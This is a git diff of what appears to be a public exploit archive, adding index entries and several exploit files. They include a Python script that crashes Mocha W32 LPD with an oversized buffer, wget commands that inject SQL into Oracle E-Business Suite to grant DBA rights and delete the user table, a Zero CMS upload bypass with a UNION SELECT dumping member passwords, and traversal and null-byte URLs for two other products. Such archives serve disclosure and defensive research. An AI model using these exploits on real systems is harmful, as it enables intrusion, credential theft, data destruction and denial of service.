diff --git a/files.csv b/files.csv index 4a64a0099..169bf0a98 100755 --- a/files.csv +++ b/files.csv @@ -4504,7 +4504,7 @@ id,file,description,date,author,platform,type,port 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability",2008-01-07,Houssamix,php,webapps,0 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 -4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 +4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 @@ -30359,7 +30359,7 @@ id,file,description,date,author,platform,type,port 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 -33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80 +33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 @@ -30481,3 +30481,7 @@ id,file,description,date,author,platform,type,port 33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0 33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0 33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0 +33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 +33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0 +33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0 +33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0 diff --git a/platforms/asp/webapps/33840.txt b/platforms/asp/webapps/33840.txt new file mode 100755 index 000000000..f0721090e --- /dev/null +++ b/platforms/asp/webapps/33840.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39534/info + +Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks. + +http://www.example.com/manager/backup.asp?bck=./../file.asp \ No newline at end of file diff --git a/platforms/multiple/remote/33839.txt b/platforms/multiple/remote/33839.txt new file mode 100755 index 000000000..fa625df39 --- /dev/null +++ b/platforms/multiple/remote/33839.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/39510/info + +Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Oracle E-Business Suite 12 is vulnerable; other versions may be affected. + +$ export TARGET=?http://www.example.com:/OA_HTML? +$ wget -O - ??$TARGET/OA.jsp? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;? +$ wget -O - ??$TARGET/OA.jsp? "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;? \ No newline at end of file diff --git a/platforms/php/webapps/4864.txt b/platforms/php/webapps/4864.txt index 3df63ef52..c116dee69 100755 --- a/platforms/php/webapps/4864.txt +++ b/platforms/php/webapps/4864.txt @@ -1,63 +1,63 @@ -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | ____ __________ __ ____ __ | - | /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | - | | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | - | | | | \ | |/ \ \___| | /_____/ | || | | - | |___|___| /\__| /______ /\___ >__| |___||__| | - | \/\______| \/ \/ | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Zero CMS Remote Arbitrary File Upload / SQL Injections | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Version: <= 1.0 Alpha (Last) | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Vendor: www.zero-cms.com | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Discovered by: KiNgOfThEwOrLd | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Intro: | - | | - | An attacker can bypass the avatar upload extension filter editing | - | the contenet type propriety | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Exploit: | - | | - | Submit to index.php?act=usercp&action=avatar a request like this: | - | | - | -----------------------------4629606643545053171986629955\r\n | - | Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n | - | \r\n | - | 20000\r\n | - | -----------------------------4629606643545053171986629955\r\n | - | Content-Disposition: form-data; name="avupload"; filename=" | - | [FILENAME].[EVIL_EXTENSION]"\r\n | - | Content-Type: image/jpeg\r\n | - | \r\n | - | [EVIL_CODE]\n | - | \r\n | - | -----------------------------4629606643545053171986629955\r\n | - | Content-Disposition: form-data; name="submit"\r\n | - | \r\n | - | Upload\r\n | - | -----------------------------4629606643545053171986629955-\r\n| -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | SQL Injections: | - | | - | The most of the variable related with the database are not properly| - | checked. Then, we get a lots of possible sql injections. | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Some Examples: | - | | - | index.php?act=poll&mode=view&id=%27 | - | forums/index.php?f=%27 | - | forums/index.php?t=%27 | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | An Exploit Example: | - | | - | index.php?act=poll&mode=view&id=9999+union+all+select+1,username, | - | password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - | Surelly there are other not filtred vars, but i don't feel like to | - | check, if u want u can find that yourself, dont you? :P | -[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] - -# milw0rm.com [2008-01-08] +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | ____ __________ __ ____ __ | + | /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | + | | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | + | | | | \ | |/ \ \___| | /_____/ | || | | + | |___|___| /\__| /______ /\___ >__| |___||__| | + | \/\______| \/ \/ | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Zero CMS Remote Arbitrary File Upload / SQL Injections | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Version: <= 1.0 Alpha (Last) | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Vendor: www.zero-cms.com | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Discovered by: KiNgOfThEwOrLd | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Intro: | + | | + | An attacker can bypass the avatar upload extension filter editing | + | the contenet type propriety | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Exploit: | + | | + | Submit to index.php?act=usercp&action=avatar a request like this: | + | | + | -----------------------------4629606643545053171986629955\r\n | + | Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n | + | \r\n | + | 20000\r\n | + | -----------------------------4629606643545053171986629955\r\n | + | Content-Disposition: form-data; name="avupload"; filename=" | + | [FILENAME].[EVIL_EXTENSION]"\r\n | + | Content-Type: image/jpeg\r\n | + | \r\n | + | [EVIL_CODE]\n | + | \r\n | + | -----------------------------4629606643545053171986629955\r\n | + | Content-Disposition: form-data; name="submit"\r\n | + | \r\n | + | Upload\r\n | + | -----------------------------4629606643545053171986629955-\r\n| +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | SQL Injections: | + | | + | The most of the variable related with the database are not properly| + | checked. Then, we get a lots of possible sql injections. | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Some Examples: | + | | + | index.php?act=poll&mode=view&id=%27 | + | forums/index.php?f=%27 | + | forums/index.php?t=%27 | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | An Exploit Example: | + | | + | index.php?act=poll&mode=view&id=9999+union+all+select+1,username, | + | password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + | Surelly there are other not filtred vars, but i don't feel like to | + | check, if u want u can find that yourself, dont you? :P | +[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*] + +# milw0rm.com [2008-01-08] diff --git a/platforms/windows/dos/33838.py b/platforms/windows/dos/33838.py new file mode 100755 index 000000000..382806051 --- /dev/null +++ b/platforms/windows/dos/33838.py @@ -0,0 +1,73 @@ +source: http://www.securityfocus.com/bid/39498/info + +Mocha W32 LPD is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. + +Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition. + +This issue affects W32 LPD 1.9; other versions may be vulnerable as well. + +#!/usr/bin/python +# ################################################################# +# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC +# Author: mr_me +# Software Link: http://mochasoft.dk/lpd.htm +# Version: 1.9 +# Tested on: Windows XP SP3 +# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023 +# Greetz to: Corelan Security Team +# http://www.corelan.be:8800/index.php/security/corelan-team-members/ +# ################################################################## +# Script provided 'as is', without any warranty. +# Use for educational purposes only. +# Do not use this code to do anything illegal ! +# Corelan does not want anyone to use this script +# for malicious and/or illegal purposes. +# Corelan cannot be held responsible for any illegal use. +# +# Note : you are not allowed to edit/modify this code. +# If you do, Corelan cannot be held responsible for any damages. +# ################################################################## +# Access violation here: +# MOV ECX,DWORD PTR DS:[EBX] +# +# The registers: +# EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa".. +# ECX 00006161 +# EDX 00A20168 +# EBX 61616161 +# ESP 0012F4B8 +# EBP 0012F6D4 +# ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa".. +# EDI 61616161 +# EIP 7C91AB8E ntdll.7C91AB8E + +import sys, socket + +print "********************************************************" +print " Mocha LPD Buffer Overflow DoS" +print " by mr_me" +print " http://net-ninja.net/ - mr_me(AT)corelan.be" +print "********************************************************" + +if len(sys.argv) < 3: + print "Usage: " + sys.argv[0] + " " + sys.exit(0) + +exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20' +exploit = '\x41' * 1500 +exploit += '\x20\x61\x6c\x6c\x0a' + +host = sys.argv[1] +port = int(sys.argv[2]) + +s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) +try: + connect = s.connect((host,port)) +except: + print "[-] Cant connect!" + +s.send("\x02") +print "[+] Sending evil payload.. ph33r o.O" +s.send(exploit) +print '[+] Server DoSed!' +s.close() diff --git a/platforms/windows/remote/33841.txt b/platforms/windows/remote/33841.txt new file mode 100755 index 000000000..13b1b852a --- /dev/null +++ b/platforms/windows/remote/33841.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/39544/info + +HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue. + +Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions. + +http://www.example.com/protected_folder/secret_file.txt%00 +http://www.example.com/?search=%25%25 \ No newline at end of file